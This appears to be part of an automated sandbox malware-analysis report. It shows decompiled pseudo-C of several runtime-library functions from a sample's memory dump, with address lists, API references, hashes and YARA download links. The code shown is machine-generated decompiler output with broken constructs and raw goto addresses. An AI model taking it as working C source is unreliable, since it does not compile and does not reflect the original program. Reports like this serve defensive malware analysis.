				r8d = r8d + 1;
				_t227 = r8d;
				if (_t227 == 0) goto 0xda8f3108;
				r9d =  *(__rdx + 4 + _t295 * 4);
				_t48 = _t293 - 2; // 0x434
				r11d =  *(__rdx + 4 + _t256 * 4);
				asm("inc ecx");
				_a24 = r11d;
				if (_t227 == 0) goto 0xda8f2e68;
				r14d = 0x20;
				r14d = r14d - 0x1f;
				_a8 = r14d;
				if (0x1f - _t48 == 0) goto 0xda8f2eb4;
				goto 0xda8f2e77;
				_a8 = 0;
				r14d = 0;
				r9d = r11d >> r14d;
				r11d = r11d << 0x20;
				r9d = r9d | r9d << 0x00000020;
				_a24 = r11d;
				if (_t208 - 2 <= 0) goto 0xda8f2eb4;
				r11d = r11d |  *(__rdx + 4 + _t256 * 4) >> r14d;
				_a24 = r11d;
				r12d = _t302 - 1;
				_v552 = _t295;
				if (r12d < 0) goto 0xda8f30c9;
				r15d = 0xffffffff;
				_v544 = _t256;
				_v64 = __r13;
				r13d = _t334 + __rdx;
				_v560 = _t256;
				if (r13d - r10d > 0) goto 0xda8f2efc;
				goto 0xda8f2efe;
				_a32 = 0;
				r11d =  *(__rcx + 4 + _t256 * 4);
				_v568 = _t277 - 4;
				_v564 = 0;
				if (0x20 == 0) goto 0xda8f2f56;
				r8d = r11d;
				r11d = r11d << 0x20;
				if (r13d - 3 < 0) goto 0xda8f2f5b;
				_t156 =  *(__rcx + 4 + (_v568 << 0x20) * 4) >> r14d;
				r11d = r11d | _t156;
				goto 0xda8f2f5b;
				_t305 = _v568;
				_t280 = _v560;
				_t314 = _t305;
				r8d = _t156 / _t280 % _t280;
				if (_t314 - __rdx <= 0) goto 0xda8f2f92;
				_t306 = _t305 + 0x1;
				if (_t306 - __rdx > 0) goto 0xda8f2fd5;
				asm("o16 nop [eax+eax]");
				_t283 = _t306 << 0x00000020 | _t295;
				if (0x1 - _t283 <= 0) goto 0xda8f2fcd;
				_t316 = __rdx - 1;
				if (_t306 + _t280 - __rdx <= 0) goto 0xda8f2fb0;
				r14d = _a8;
				if (_t316 == 0) goto 0xda8f30a0;
				r11d = 0;
				if (_t208 == 0) goto 0xda8f304c;
				r15d = _a8;
				r8d = r10d;
				_t323 =  >=  ? _t295 + 0x1 >> 0x20 : (_t295 + 0x1 >> 0x20) + 1;
				r11d = r11d + 1;
				 *((intOrPtr*)(__rcx + 4 + _t283 * 4)) = __rcx[0xffffffff00000002] - r8d;
				if (r11d - _t208 < 0) goto 0xda8f3000;
				r14d = r15d;
				_a8 = r15d;
				r15d = 0xffffffff;
				if (0x1 - _t323 >= 0) goto 0xda8f309c;
				r10d = 0;
				if (_t208 == 0) goto 0xda8f3099;
				r10d = r10d + 1;
				_t289 =  &(__rcx[0xffffffff00000001]);
				 *(_t289 + 4) = r8d;
				_t244 = r10d - _t208;
				if (_t244 < 0) goto 0xda8f3070;
				_t120 = _t335 - 1; // 0x0
				r10d = _t120;
				r13d = r13d - 1;
				r12d = r12d - 1;
				_v552 = (_v552 << 0x20) + 0x1;
				if (_t244 >= 0) goto 0xda8f2ef0;
				r10d = r10d + 1;
				if (r10d -  *__rcx >= 0) goto 0xda8f30e0;
				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t314) * _t280 * __rdx - _t287) * _t316 * 4)) = 0;
				if (r10d + 1 -  *__rcx < 0) goto 0xda8f30d4;
				 *__rcx = r10d;
				if (r10d == 0) goto 0xda8f3103;
				_t206 = _t323 - 1;
				r10d = _t206;
				if ( *((intOrPtr*)(__rcx + 4 + _t289 * 4)) != 0) goto 0xda8f3103;
				 *__rcx = _t206;
				if (_t206 != 0) goto 0xda8f30f0;
				goto 0xda8f310a;
				return 0;
			}

0x7ff7da8f2c80
0x7ff7da8f2c80
0x7ff7da8f2c96
0x7ff7da8f2ca2
0x7ff7da8f2cac
0x7ff7da8f2cb2
0x7ff7da8f2cb5
0x7ff7da8f2cba
0x7ff7da8f2cc0
0x7ff7da8f2cca
0x7ff7da8f2cd4
0x7ff7da8f2cd8
0x7ff7da8f2cda
0x7ff7da8f2cdd
0x7ff7da8f2ce6
0x7ff7da8f2ced
0x7ff7da8f2cf5
0x7ff7da8f2cf7
0x7ff7da8f2cff
0x7ff7da8f2d01
0x7ff7da8f2d08
0x7ff7da8f2d11
0x7ff7da8f2d1a
0x7ff7da8f2d21
0x7ff7da8f2d24
0x7ff7da8f2d2d
0x7ff7da8f2d2f
0x7ff7da8f2d34
0x7ff7da8f2d43
0x7ff7da8f2d50
0x7ff7da8f2d5b
0x7ff7da8f2d6d
0x7ff7da8f2d78
0x7ff7da8f2d7e
0x7ff7da8f2d80
0x7ff7da8f2d83
0x7ff7da8f2d87
0x7ff7da8f2d8c
0x7ff7da8f2d97
0x7ff7da8f2d9f
0x7ff7da8f2dab
0x7ff7da8f2dae
0x7ff7da8f2db4
0x7ff7da8f2db6
0x7ff7da8f2dbe
0x7ff7da8f2dc4
0x7ff7da8f2dc7
0x7ff7da8f2dca
0x7ff7da8f2dcd
0x7ff7da8f2dd0
0x7ff7da8f2dd6
0x7ff7da8f2ded
0x7ff7da8f2df7
0x7ff7da8f2df9
0x7ff7da8f2e06
0x7ff7da8f2e08
0x7ff7da8f2e10
0x7ff7da8f2e13
0x7ff7da8f2e1f
0x7ff7da8f2e21
0x7ff7da8f2e24
0x7ff7da8f2e27
0x7ff7da8f2e2d
0x7ff7da8f2e32
0x7ff7da8f2e35
0x7ff7da8f2e3c
0x7ff7da8f2e40
0x7ff7da8f2e48
0x7ff7da8f2e4f
0x7ff7da8f2e57
0x7ff7da8f2e5a
0x7ff7da8f2e64
0x7ff7da8f2e66
0x7ff7da8f2e6d
0x7ff7da8f2e74
0x7ff7da8f2e86
0x7ff7da8f2e89
0x7ff7da8f2e8c
0x7ff7da8f2e8f
0x7ff7da8f2e9a
0x7ff7da8f2ea9
0x7ff7da8f2eac
0x7ff7da8f2eb4
0x7ff7da8f2eb8
0x7ff7da8f2ec3
0x7ff7da8f2ecc
0x7ff7da8f2ed2
0x7ff7da8f2eda
0x7ff7da8f2ee2
0x7ff7da8f2ee6
0x7ff7da8f2ef3
0x7ff7da8f2efa
0x7ff7da8f2efe
0x7ff7da8f2f11
0x7ff7da8f2f16
0x7ff7da8f2f1b
0x7ff7da8f2f21
0x7ff7da8f2f28
0x7ff7da8f2f3b
0x7ff7da8f2f42
0x7ff7da8f2f4f
0x7ff7da8f2f51
0x7ff7da8f2f54
0x7ff7da8f2f56
0x7ff7da8f2f5b
0x7ff7da8f2f6a
0x7ff7da8f2f73
0x7ff7da8f2f79
0x7ff7da8f2f8f
0x7ff7da8f2f95
0x7ff7da8f2fa7
0x7ff7da8f2fb7
0x7ff7da8f2fbd
0x7ff7da8f2fbf
0x7ff7da8f2fcb
0x7ff7da8f2fcd
0x7ff7da8f2fd8
0x7ff7da8f2fe1
0x7ff7da8f2fe6
0x7ff7da8f2ff0
0x7ff7da8f3012
0x7ff7da8f3028
0x7ff7da8f302f
0x7ff7da8f3032
0x7ff7da8f3039
0x7ff7da8f303b
0x7ff7da8f303e
0x7ff7da8f3046
0x7ff7da8f3062
0x7ff7da8f3064
0x7ff7da8f3069
0x7ff7da8f3074
0x7ff7da8f307b
0x7ff7da8f308c
0x7ff7da8f3094
0x7ff7da8f3097
0x7ff7da8f309c
0x7ff7da8f309c
0x7ff7da8f30a5
0x7ff7da8f30b2
0x7ff7da8f30b6
0x7ff7da8f30bb
0x7ff7da8f30c9
0x7ff7da8f30d2
0x7ff7da8f30d8
0x7ff7da8f30de
0x7ff7da8f30e0
0x7ff7da8f30e6
0x7ff7da8f30f0
0x7ff7da8f30f4
0x7ff7da8f30fb
0x7ff7da8f30fd
0x7ff7da8f3101
0x7ff7da8f3106
0x7ff7da8f311b

APIs

memcpy_s.LIBCPMT ref: 00007FF7DA8F2CE6
memcpy_s.LIBCPMT ref: 00007FF7DA8F2D11

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: a64fd4d92c7f22eb7216a882d46fb8650dac1d01c69247093963c173a5c2efe0
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: E5C10172B1928787EB25DF19A04466EFB91F7A4B84FC08176DF5A43785DA3DE811CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F8AB8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7DA8F8D07
RaiseException.KERNEL32 ref: 00007FF7DA8F8D18

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 74b74fac905c79e0ebaf08103afb4d2b2a55cd2fde682fd1ab498cab3797c563
Instruction ID: 15e4a2d0c3385056f5334bd1e11090be473cb89c8b55d9516c91c6894cd5dbde
Opcode Fuzzy Hash: 74b74fac905c79e0ebaf08103afb4d2b2a55cd2fde682fd1ab498cab3797c563
Instruction Fuzzy Hash: 61B19C73601B8A8BEB56DF29C84236C7BE0F750B48F948862DE5D837A5CB39D461C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E2B54 Relevance: 2.8, Strings: 2, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E00007FF77FF7DA8E2B54(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t124;
				signed int _t155;
				void* _t159;
				unsigned int _t164;
				signed char _t165;
				signed int _t168;
				signed short _t184;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t196;
				signed long long _t245;
				void* _t263;
				signed int** _t274;
				signed int** _t277;
				signed int** _t281;
				signed int*** _t283;
				signed long long _t288;
				signed int** _t293;
				void* _t295;
				signed int* _t296;
				long long _t300;
				void* _t303;
				signed long long _t304;
				void* _t306;
				void* _t312;
				signed long long _t316;
				void* _t318;
				signed int*** _t319;
				void* _t321;

				_t306 = __r8;
				_t298 = __rsi;
				 *((long long*)(_t303 + 0x10)) = __rbx;
				 *((long long*)(_t303 + 0x18)) = _t300;
				 *((long long*)(_t303 + 0x20)) = __rsi;
				_t304 = _t303 - 0x50;
				_t245 =  *0xda90d008; // 0xde4e6c2f3c2e
				 *(_t304 + 0x40) = _t245 ^ _t304;
				_t263 = __rcx;
				_t155 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t6 = _t295 - 0x37; // 0x41
				_t188 = _t6;
				_t7 = _t295 - 0x20; // 0x58
				_t184 = _t7;
				_t189 = _t155 - 0x64;
				if (_t189 > 0) goto 0xda8e2c07;
				if (_t189 == 0) goto 0xda8e2c31;
				_t190 = _t155 - 0x53;
				if (_t190 > 0) goto 0xda8e2bd0;
				if (_t190 == 0) goto 0xda8e2c77;
				if (_t190 == 0) goto 0xda8e2bc3;
				if (_t190 == 0) goto 0xda8e2beb;
				if (_t190 == 0) goto 0xda8e2bc3;
				_t159 = _t155 - _t188 - 0xffffffffffffffff;
				if (_t190 == 0) goto 0xda8e2bc3;
				if (_t159 != 1) goto 0xda8e2ca0;
				E00007FF77FF7DA8E3308(0x78, __rcx, __rcx, _t300);
				goto 0xda8e2c99;
				if (_t159 == _t184) goto 0xda8e2c8f;
				if (_t159 == 0x5a) goto 0xda8e2bfa;
				if (_t159 == 0x61) goto 0xda8e2bc3;
				if (_t159 != 0x63) goto 0xda8e2ca0;
				E00007FF77FF7DA8E3644(_t159 - 0x63, __rcx, __rcx, __rsi, _t321, _t318);
				goto 0xda8e2c99;
				E00007FF77FF7DA8E3034(_t159, __rcx, __rcx, _t298, _t316);
				goto 0xda8e2c99;
				_t196 = _t159 - 0x6f;
				if (_t196 > 0) goto 0xda8e2c60;
				if (_t196 == 0) goto 0xda8e2c41;
				if (_t196 == 0) goto 0xda8e2bc3;
				if (_t196 == 0) goto 0xda8e2bc3;
				if (_t196 == 0) goto 0xda8e2bc3;
				if (_t196 == 0) goto 0xda8e2c31;
				if (_t159 - 0x61 != 5) goto 0xda8e2ca0;
				E00007FF77FF7DA8E3708(__rcx, __rcx);
				goto 0xda8e2c99;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				E00007FF77FF7DA8E0F04(0, __rcx, __rcx, _t295, _t298, _t300, _t312, _t295);
				goto 0xda8e2c99;
				_t164 =  *(__rcx + 0x28);
				if ((_t164 >> 0x00000005 & 0x00000001) == 0) goto 0xda8e2c54;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t164;
				E00007FF77FF7DA8E0AF4(0, __rcx, __rcx, _t295, _t298, _t300);
				goto 0xda8e2c99;
				if (_t164 == 0x70) goto 0xda8e2c81;
				if (_t164 == 0x73) goto 0xda8e2c77;
				if (_t164 == 0x75) goto 0xda8e2c35;
				if (_t164 != 0x78) goto 0xda8e2ca0;
				goto 0xda8e2c91;
				E00007FF77FF7DA8E385C(__rcx, __rcx, _t298);
				goto 0xda8e2c99;
				 *((intOrPtr*)(_t263 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t263 + 0x34)) = 0xb;
				_t124 = E00007FF77FF7DA8E1314(1, _t263, _t263, _t295, _t298, _t300);
				r13d = 0;
				if (_t124 != 0) goto 0xda8e2ca7;
				goto 0xda8e2f8d;
				if ( *((intOrPtr*)(_t263 + 0x38)) != r13b) goto 0xda8e2f8b;
				_t165 =  *(_t263 + 0x28);
				 *(_t304 + 0x34) = 0;
				_t288 = _t316;
				 *((short*)(_t304 + 0x38)) = 0;
				r12d = 0x20;
				if (0 == 0) goto 0xda8e2d05;
				if (0 == 0) goto 0xda8e2ce6;
				_t24 = _t312 + 0xd; // 0xd
				 *(_t304 + 0x34) = _t24;
				goto 0xda8e2d00;
				if ((_t165 & 0x00000001) == 0) goto 0xda8e2cf2;
				goto 0xda8e2cdf;
				if (0 == 0) goto 0xda8e2d05;
				 *(_t304 + 0x34) = r12w;
				r8d =  *(_t263 + 0x3a) & 0x0000ffff;
				r10d = 0xffdf;
				if ((r10w & (r8w & 0xffffffff) - _t184) != 0) goto 0xda8e2d29;
				r9b = 1;
				if (0 != 0) goto 0xda8e2d2c;
				r9b = r13b;
				r15d = 0x30;
				if (r9b != 0) goto 0xda8e2d49;
				if (0 == 0) goto 0xda8e2d67;
				 *(_t304 + 0x34 + _t288 * 2) = r15w;
				if (r8w == _t184) goto 0xda8e2d5b;
				if (r8w != _t188) goto 0xda8e2d5e;
				 *((short*)(_t304 + 0x36 + _t288 * 2)) = _t184 & 0x0000ffff;
				_t187 =  *((intOrPtr*)(_t263 + 0x2c)) - 1 -  *(_t263 + 0x48);
				if ((_t165 & 0x0000000c) != 0) goto 0xda8e2ddb;
				r9d = r13d;
				if (_t187 <= 0) goto 0xda8e2ddb;
				r8d =  *(_t263 + 0x20);
				_t274 =  *(_t263 + 0x460);
				if ( *((intOrPtr*)(_t274 + 0x10)) !=  *((intOrPtr*)(_t274 + 8))) goto 0xda8e2da5;
				if ( *((intOrPtr*)(_t274 + 0x18)) == r13b) goto 0xda8e2d9b;
				r8d = r8d + 1;
				goto 0xda8e2d9f;
				r8d = r8d | 0xffffffff;
				 *(_t263 + 0x20) = r8d;
				goto 0xda8e2dc9;
				 *(_t263 + 0x20) = _t306 + 1;
				 *((long long*)(_t274 + 0x10)) =  *((long long*)(_t274 + 0x10)) + 1;
				 *( *( *(_t263 + 0x460))) = r12w;
				 *( *(_t263 + 0x460)) =  &(( *( *(_t263 + 0x460)))[0]);
				r8d =  *(_t263 + 0x20);
				if (r8d == 0xffffffff) goto 0xda8e2ddb;
				r9d = r9d + 1;
				if (r9d - _t187 < 0) goto 0xda8e2d7f;
				_t296 = _t263 + 0x20;
				r8d = 1;
				 *((long long*)(_t304 + 0x20)) =  *((intOrPtr*)(_t263 + 8));
				_t319 = _t263 + 0x460;
				_t67 = _t304 + 0x34; // 0x54
				E00007FF77FF7DA8E3A8C(_t306 + 1, _t187, _t263, _t319, _t298, _t300, _t296);
				if (0 == 0) goto 0xda8e2e66;
				if (( *(_t263 + 0x28) >> 0x00000002 & 0x00000001) != 0) goto 0xda8e2e66;
				r8d = r13d;
				if (_t187 <= 0) goto 0xda8e2e66;
				_t277 =  *_t319;
				if ( *((intOrPtr*)(_t277 + 0x10)) !=  *((intOrPtr*)(_t277 + 8))) goto 0xda8e2e3d;
				if ( *((intOrPtr*)(_t277 + 0x18)) == r13b) goto 0xda8e2e36;
				goto 0xda8e2e39;
				 *_t296 =  *_t296 + 0x00000001 | 0xffffffff;
				goto 0xda8e2e57;
				 *_t296 = _t67 + 1;
				 *((long long*)(_t277 + 0x10)) =  *((long long*)(_t277 + 0x10)) + 1;
				 *( *( *_t319)) = r15w;
				 *( *_t319) =  &(( *( *_t319))[0]);
				if ( *_t296 == 0xffffffff) goto 0xda8e2e66;
				r8d = r8d + 1;
				if (r8d - _t187 < 0) goto 0xda8e2e1f;
				if ( *((intOrPtr*)(_t263 + 0x4c)) != r13b) goto 0xda8e2f3d;
				if ( *(_t263 + 0x48) - r13d <= 0) goto 0xda8e2f3d;
				_t301 =  *((intOrPtr*)(_t263 + 8));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t263 + 8)) + 0x28)) != r13b) goto 0xda8e2e8c;
				E00007FF77FF7DA8E3970( *_t319, _t263,  *((intOrPtr*)(_t263 + 8)), _t298);
				r15d = r13d;
				if ( *(_t263 + 0x48) == r13d) goto 0xda8e2f04;
				_t86 = _t304 + 0x30; // 0x50
				 *(_t304 + 0x30) = r13w;
				if (E00007FF77FF7DA8EDB00( *(_t263 + 0x28) >> 2, _t188, _t263, _t86,  *((intOrPtr*)(_t263 + 0x40)), _t296, _t298, _t301,  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x18)) + 8)),  *((intOrPtr*)(_t263 + 8))) <= 0) goto 0xda8e2f38;
				_t281 =  *_t319;
				r8d =  *(_t304 + 0x30) & 0x0000ffff;
				if ( *((intOrPtr*)(_t281 + 0x10)) !=  *((intOrPtr*)(_t281 + 8))) goto 0xda8e2ee1;
				if ( *((intOrPtr*)(_t281 + 0x18)) == r13b) goto 0xda8e2edc;
				 *_t296 =  *_t296 + 1;
				goto 0xda8e2ef8;
				 *_t296 =  *_t296 | 0xffffffff;
				goto 0xda8e2ef8;
				 *_t296 =  *_t296 + 1;
				 *((long long*)(_t281 + 0x10)) =  *((long long*)(_t281 + 0x10)) + 1;
				 *( *( *_t319)) = r8w;
				 *( *_t319) =  &(( *( *_t319))[0]);
				r15d = r15d + 1;
				if (r15d !=  *(_t263 + 0x48)) goto 0xda8e2e99;
				r12d = 0x20;
				_t168 =  *_t296;
				if (_t168 < 0) goto 0xda8e2f8b;
				if (0 == 0) goto 0xda8e2f8b;
				r8d = r13d;
				if (_t187 <= 0) goto 0xda8e2f8b;
				_t293 =  *_t319;
				if ( *((intOrPtr*)(_t293 + 0x10)) !=  *((intOrPtr*)(_t293 + 8))) goto 0xda8e2f62;
				if ( *((intOrPtr*)(_t293 + 0x18)) == r13b) goto 0xda8e2f5b;
				goto 0xda8e2f5e;
				 *_t296 =  *_t296 | 0xffffffff;
				goto 0xda8e2f04;
				r8d =  *(_t263 + 0x48);
				_t283 = _t319;
				 *((long long*)(_t304 + 0x20)) =  *((intOrPtr*)(_t263 + 8));
				E00007FF77FF7DA8E3A8C( *(_t263 + 0x28) >> 2, _t187, _t263, _t283, _t298, _t301, _t296);
				goto 0xda8e2f0a;
				 *_t296 = _t168 + 0x00000001 | 0xffffffff;
				goto 0xda8e2f7c;
				 *_t296 =  &(_t283[0]);
				 *((long long*)( *((intOrPtr*)(_t263 + 0x40)) + 0x10)) =  *((long long*)( *((intOrPtr*)(_t263 + 0x40)) + 0x10)) + 1;
				 *( *( *_t319)) = r12w;
				 *( *_t319) =  &(( *( *_t319))[0]);
				if ( *_t296 == 0xffffffff) goto 0xda8e2f8b;
				r8d = r8d + 1;
				if (r8d - _t187 < 0) goto 0xda8e2f21;
				return E00007FF77FF7DA8DACF0(1,  *_t296,  *(_t304 + 0x40) ^ _t304);
			}

0x7ff7da8e2b54
0x7ff7da8e2b54
0x7ff7da8e2b54
0x7ff7da8e2b59
0x7ff7da8e2b5e
0x7ff7da8e2b6c
0x7ff7da8e2b70
0x7ff7da8e2b7a
0x7ff7da8e2b84
0x7ff7da8e2b87
0x7ff7da8e2b8b
0x7ff7da8e2b8b
0x7ff7da8e2b8e
0x7ff7da8e2b8e
0x7ff7da8e2b91
0x7ff7da8e2b94
0x7ff7da8e2b96
0x7ff7da8e2b9c
0x7ff7da8e2b9f
0x7ff7da8e2ba1
0x7ff7da8e2ba9
0x7ff7da8e2bae
0x7ff7da8e2bb3
0x7ff7da8e2bb5
0x7ff7da8e2bb8
0x7ff7da8e2bbd
0x7ff7da8e2bc6
0x7ff7da8e2bcb
0x7ff7da8e2bd2
0x7ff7da8e2bdb
0x7ff7da8e2be0
0x7ff7da8e2be5
0x7ff7da8e2bf0
0x7ff7da8e2bf5
0x7ff7da8e2bfd
0x7ff7da8e2c02
0x7ff7da8e2c07
0x7ff7da8e2c0a
0x7ff7da8e2c0c
0x7ff7da8e2c11
0x7ff7da8e2c16
0x7ff7da8e2c1b
0x7ff7da8e2c20
0x7ff7da8e2c25
0x7ff7da8e2c2a
0x7ff7da8e2c2f
0x7ff7da8e2c31
0x7ff7da8e2c3a
0x7ff7da8e2c3f
0x7ff7da8e2c41
0x7ff7da8e2c4b
0x7ff7da8e2c4d
0x7ff7da8e2c51
0x7ff7da8e2c59
0x7ff7da8e2c5e
0x7ff7da8e2c63
0x7ff7da8e2c68
0x7ff7da8e2c6d
0x7ff7da8e2c71
0x7ff7da8e2c75
0x7ff7da8e2c7a
0x7ff7da8e2c7f
0x7ff7da8e2c81
0x7ff7da8e2c88
0x7ff7da8e2c94
0x7ff7da8e2c99
0x7ff7da8e2c9e
0x7ff7da8e2ca2
0x7ff7da8e2cab
0x7ff7da8e2cb1
0x7ff7da8e2cb6
0x7ff7da8e2cba
0x7ff7da8e2cbd
0x7ff7da8e2cc2
0x7ff7da8e2ccf
0x7ff7da8e2cd8
0x7ff7da8e2cda
0x7ff7da8e2cdf
0x7ff7da8e2ce4
0x7ff7da8e2ce9
0x7ff7da8e2cf0
0x7ff7da8e2cf8
0x7ff7da8e2cfa
0x7ff7da8e2d05
0x7ff7da8e2d0a
0x7ff7da8e2d1b
0x7ff7da8e2d1f
0x7ff7da8e2d27
0x7ff7da8e2d29
0x7ff7da8e2d30
0x7ff7da8e2d43
0x7ff7da8e2d47
0x7ff7da8e2d49
0x7ff7da8e2d53
0x7ff7da8e2d59
0x7ff7da8e2d5e
0x7ff7da8e2d6c
0x7ff7da8e2d72
0x7ff7da8e2d74
0x7ff7da8e2d79
0x7ff7da8e2d7b
0x7ff7da8e2d7f
0x7ff7da8e2d8e
0x7ff7da8e2d94
0x7ff7da8e2d96
0x7ff7da8e2d99
0x7ff7da8e2d9b
0x7ff7da8e2d9f
0x7ff7da8e2da3
0x7ff7da8e2da9
0x7ff7da8e2dac
0x7ff7da8e2dba
0x7ff7da8e2dc5
0x7ff7da8e2dc9
0x7ff7da8e2dd1
0x7ff7da8e2dd3
0x7ff7da8e2dd9
0x7ff7da8e2ddf
0x7ff7da8e2de3
0x7ff7da8e2de6
0x7ff7da8e2deb
0x7ff7da8e2df8
0x7ff7da8e2dfd
0x7ff7da8e2e0c
0x7ff7da8e2e14
0x7ff7da8e2e16
0x7ff7da8e2e1b
0x7ff7da8e2e1f
0x7ff7da8e2e2a
0x7ff7da8e2e30
0x7ff7da8e2e34
0x7ff7da8e2e39
0x7ff7da8e2e3b
0x7ff7da8e2e40
0x7ff7da8e2e42
0x7ff7da8e2e4c
0x7ff7da8e2e53
0x7ff7da8e2e5c
0x7ff7da8e2e5e
0x7ff7da8e2e64
0x7ff7da8e2e6a
0x7ff7da8e2e74
0x7ff7da8e2e7a
0x7ff7da8e2e82
0x7ff7da8e2e87
0x7ff7da8e2e8c
0x7ff7da8e2e97
0x7ff7da8e2e9d
0x7ff7da8e2ea9
0x7ff7da8e2ebd
0x7ff7da8e2ebf
0x7ff7da8e2ec2
0x7ff7da8e2ed0
0x7ff7da8e2ed6
0x7ff7da8e2ed8
0x7ff7da8e2eda
0x7ff7da8e2edc
0x7ff7da8e2edf
0x7ff7da8e2ee1
0x7ff7da8e2ee3
0x7ff7da8e2eed
0x7ff7da8e2ef4
0x7ff7da8e2efb
0x7ff7da8e2f02
0x7ff7da8e2f04
0x7ff7da8e2f0a
0x7ff7da8e2f0e
0x7ff7da8e2f18
0x7ff7da8e2f1a
0x7ff7da8e2f1f
0x7ff7da8e2f21
0x7ff7da8e2f2c
0x7ff7da8e2f32
0x7ff7da8e2f36
0x7ff7da8e2f38
0x7ff7da8e2f3b
0x7ff7da8e2f44
0x7ff7da8e2f48
0x7ff7da8e2f4f
0x7ff7da8e2f54
0x7ff7da8e2f59
0x7ff7da8e2f5e
0x7ff7da8e2f60
0x7ff7da8e2f65
0x7ff7da8e2f67
0x7ff7da8e2f71
0x7ff7da8e2f78
0x7ff7da8e2f81
0x7ff7da8e2f83
0x7ff7da8e2f89
0x7ff7da8e2fb7

Strings

, xrefs: 00007FF7DA8E2CC2
, xrefs: 00007FF7DA8E2F04

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 089c56a23d9dfdc55ef2d2286675d83662a3bd811f7c67310a65c9fae7cea101
Instruction ID: 1e46c377721bf6addde915840e4b5875365754f6cf9c5e9810420febfa19990c
Opcode Fuzzy Hash: 089c56a23d9dfdc55ef2d2286675d83662a3bd811f7c67310a65c9fae7cea101
Instruction Fuzzy Hash: 53E1B572A08606C1FF6AAF25C05013DE360FB65B44FD40176DE0E47696EF2EEA61C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8ECFE8 Relevance: 2.6, Strings: 2, Instructions: 144
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00007FF77FF7DA8ECFE8(void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32, long long _a64) {
				void* _t17;
				long long _t32;
				void* _t42;
				void* _t45;
				void* _t46;

				_t46 = _t42;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = __rbp;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				r13b = r9b;
				_t16 =  >  ? __ebp : 0;
				_t17 = ( >  ? __ebp : 0) + 9;
				if (__rdx - __rax > 0) goto 0xda8ed070;
				_t32 = _a64;
				 *((long long*)(_t46 - 0x20)) = _t32;
				r9d = 0;
				 *(_t46 - 0x28) =  *(_t46 - 0x28) & 0x00000000;
				r8d = 0;
				 *((char*)(_t32 + 0x30)) = 1;
				 *((intOrPtr*)(_t32 + 0x2c)) = 0x22;
				E00007FF77FF7DA8E9C34(__rax, __rbx, _t32, __rdx, __rsi, r8d, _t45);
				return 0x22;
			}

0x7ff7da8ecfe8
0x7ff7da8ecfeb
0x7ff7da8ecfef
0x7ff7da8ecff3
0x7ff7da8ecff7
0x7ff7da8ed00d
